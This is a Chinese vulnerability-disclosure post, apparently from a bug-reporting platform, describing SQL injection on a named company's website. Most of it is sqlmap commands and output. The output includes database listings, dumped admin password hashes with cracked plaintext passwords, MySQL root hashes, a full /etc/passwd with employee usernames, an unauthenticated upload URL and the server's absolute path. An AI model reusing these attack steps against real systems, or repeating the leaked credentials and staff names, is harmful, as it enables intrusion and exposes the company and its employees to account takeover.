webpower官网sql注入漏洞,已入后台,数据库root权限
http://www.webpowerasia.com/m/con.php?id=11
通过sqlmap测试:
code 区域
available databases [19]:
[*] information_schema
[*] k11_birthday
[*] k11_optin
[*] ktest
[*] mysql
[*] phpmyadmin
[*] site_xbox
[*] task
[*] ued_wiki
[*] webpower_website
[*] wechat_site
[*] wp-e-sight
[*] wp-e-sight-en
[*] wp_e-home
[*] wp_faq
[*] wp_task
[*] wp_tl-group
[*] wp_webpowerasia
[*] wp_website
先来拿下网站吧:
尝试寻找网站数据库并获取后台用户名和密码:
code 区域
Database: wp_webpowerasia
[16 tables]
+-------------------+
| cases_category |
| customer_category |
| manage_about |
| manage_admin |
| manage_admin_log |
| manage_apply |
| manage_cases |
| manage_config |
| manage_customer |
| manage_event |
| manage_links |
| manage_mt |
| manage_news |
| manage_post |
| post_category |
| tag_category |
+-------------------+
Database: wp_webpowerasia
Table: manage_admin
[4 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| content | mediumtext |
| id | int(11) |
| username | varchar(200) |
| userpassword | varchar(200) |
+--------------+--------------+
Database: wp_webpowerasia
Table: manage_admin
[1 entry]
+----------+----------------------------------+
| username | userpassword |
+----------+----------------------------------+
| admin | 6966fe537468bb6a170b3c40ba22538d |
+----------+----------------------------------+
解密结果为:webp0wer
,获取后台:
http://www.webpowerasia.com/manage/index.php
登陆试试:
网站有两种上传类型,一个是编辑器:CKEditor 3.2.1 (revision 5372) 可修改上传文件名;一个是自己写的 这里存在任意文件上传:
http://www.webpowerasia.com//uploadfile/201604/20160404010622.txt
上传点可未授权访问:
http://www.webpowerasia.com//manage/post/up_pic.php
透过后台得到网站绝对路径:
/var/www/html/webpowerasia
那我们来通过注入获取文件:
sqlmap.py -u "http://www.webpowerasia.com/m/con.php?id=29" --file-read "etc/passwd"
code 区域
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
qpidd:x:498:499:Owner of Qpidd Daemons:/var/lib/qpidd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
alonso.chen:x:501:501::/home/alonso.chen:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
leo.chen:x:502:502::/home/leo.chen:/bin/bash
rocky.zhang:x:503:503::/home/rocky.zhang:/bin/bash
postmaster:x:504:504::/home/postmaster:/sbin/nologin
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
dovenull:x:497:496:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
koen:x:505:505::/home/koen:/bin/bash
kuku.li:x:507:507::/home/kuku.li:/bin/bash
bob.liu:x:508:508::/home/bob.liu:/bin/bash
michael.han:x:509:510::/home/michael.han:/bin/bash
mkt_upload:x:512:513::/var/www/html/webpowerwebsite/uploadfile/markting:/bin/bash
pluto.chan:x:513:514::/home/pluto.chan:/bin/bash
rain.zhao:x:514:515::/home/rain.zhao:/bin/bash
zabbix:x:496:495:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
还可以获取数据库用户名和密码哦,这里再贴一下其他数据吧:
code 区域
database management system users password hashes:
[*] alonso.chen [1]:
password hash: *80F2C54DD0E8548D01BCA1D75AB6E4A5FD1AA7BF
[*] root [2]:
password hash: *51BBF7BD5C01E0212ED1EC596FA7CCE962AA1B33
password hash: NULL
Database: wp_website
[16 tables]
+-------------------+
| cases_category |
| customer_category |
| manage_about |
| manage_admin |
| manage_admin_log |
| manage_apply |
| manage_cases |
| manage_config |
| manage_customer |
| manage_event |
| manage_links |
| manage_mt |
| manage_news |
| manage_post |
| post_category |
| tag_category |
+-------------------+
Table: manage_admin
[4 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| content | mediumtext |
| id | int(11) |
| username | varchar(200) |
| userpassword | varchar(200) |
+--------------+--------------+
Table: manage_admin
[1 entry]
+---------------+----------------------------------+
| username | userpassword |
+---------------+----------------------------------+
| webpowerchina | 1309112725a40e38aa14e35e3a50a53c |
+---------------+----------------------------------+
Database: wp_faq
Table: manage_admin
[9 entries]
+-------------+----------------------------------+
| username | userpassword |
+-------------+----------------------------------+
| admin | 6f292abc57aa3dde9ef9886c590d26f3 | Webpower1
| wp_leo | 6966fe537468bb6a170b3c40ba22538d |
| nicole.shen | b56e0b4ea4962283bee762525c2d490f |
| van.fan | 6966fe537468bb6a170b3c40ba22538d |
| monica.sun | 6966fe537468bb6a170b3c40ba22538d |
| joyce.huang | 76e2e42643666620948c29cc8ca48f78 |
| allen.jing | 4f066b79b7ffe87cb953536d470b07e0 |
| cathy | 25d55ad283aa400af464c76d713c07ad |
| <blank> | d41d8cd98f00b204e9800998ecf8427e |
上一篇:免费一个月Linux vps
下一篇:长春工业大学某站数据库备份外泄